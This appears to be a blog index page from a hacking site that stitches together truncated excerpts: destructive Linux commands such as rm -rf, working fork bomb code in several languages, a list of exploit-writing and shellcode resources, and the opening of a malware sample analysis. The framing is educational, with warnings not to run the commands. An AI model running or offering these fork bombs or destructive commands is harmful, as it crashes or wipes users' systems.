da3m0n s3c

After implementing a fork bomb in eleven different language implementations ~] the tuto [~ , I got inspired to revisit the few strings when executed in the Linux terminal, can be all kinds of destructive to the host. I'm not re-inventing the wheel here. Many of you probably know them, (and the variants), there's nothing new here. However, it's a good practice to review these type of things from time to time. So enjoy but do not run any of these on your system. I have provided descriptions for each, discussing what the results will be if you make a mistake. If these are new to you, understand the precautions, and do not use any of these. Thank you. . rm rf The rm -rf command is a simplistic, low level cmd an one of the fastest ways to delete files, dirs and their contents. But a little ignorance of the cmds may result in an unrecoverable system, even damage hw. Some of the destructive options used with rm are: . rm              //* base cmd used to delete files. .

anyone that has worked with Linux for any amount of time, the word fork bomb will be familiar. However, it's not just a terminal command. Below are some implementations in other languages, followed by mitigation tactics for Linux distros. BASH $ :(){ :|: & };: .sh (Shell file) #!/bin/bash ./$0|./$0& .bat (Windows bat implements) :TOP start "" %0 goto TOP ~OR~ %0|%0   #below is the same, but done in command line using ^ to escape specials: echo %0^|%0 > forkbomb.bat forkbomb.bat .pl (Perl implement) #! /bin/perl perl -e "fork while fork" & .py (Python implement) #! /bin/py import os while 1:     os.fork() (Java implement) public class ForkBomb {  public static void main(String[] args)   {    while(true)    { Runtime.getRuntime().exec(new String[]{"javaw", "-cp", System.getProperty("java.class.path"), "ForkBomb"});   }  } } .js (Jav

A little collection I've put together for the craft of exploit writing and shellcode use. Guide books, resources and one large Shellcode DB for the finish (bottom link). Stack-based Windows Buffer Overflow A large collection of  Exploit Tutos  by our friends at  Fuzzy Sec Windows Exploit Development  using the Immunity Debugger . Thanks to Sift Security Shellcoder's Handbook 0x2 exploit tuto - Web havking with BurpSuite 0x7 exploit tuto - web scanning and exploitation Shellcode source repo , a large collection of code by category, with Exploit name and desciption. Cheerz...   d_c0

This anonymous submission came to us a few days ago, only with the knowledge that the this payload tripped and was dropped by an Enterprise level A/V appliance. The 'submitter' got their hands on it and asked us to break it down. For this project, I elicited the help of F1re_W1re , a very good c0d3r as well as a very good brother. we have worked together many times in the past, with nothing but amazing results. When a second set of eyes or decoded iteration is needed, he is my go to. A hat tip to you, Sir. This project was a true collaboration of skillz to which I graciously thank him for his role as primary contributor. For reasons, I assumed the role of  Project Manager (PM), and Lead Consultant . This was solved by both of us doing out part and offering input and direction as needed. Often time it takes another set of eyes to see what's there, (or just not apparent). You will get what I mean later on. Let's get at it!! After acquiring the sample, it was clear th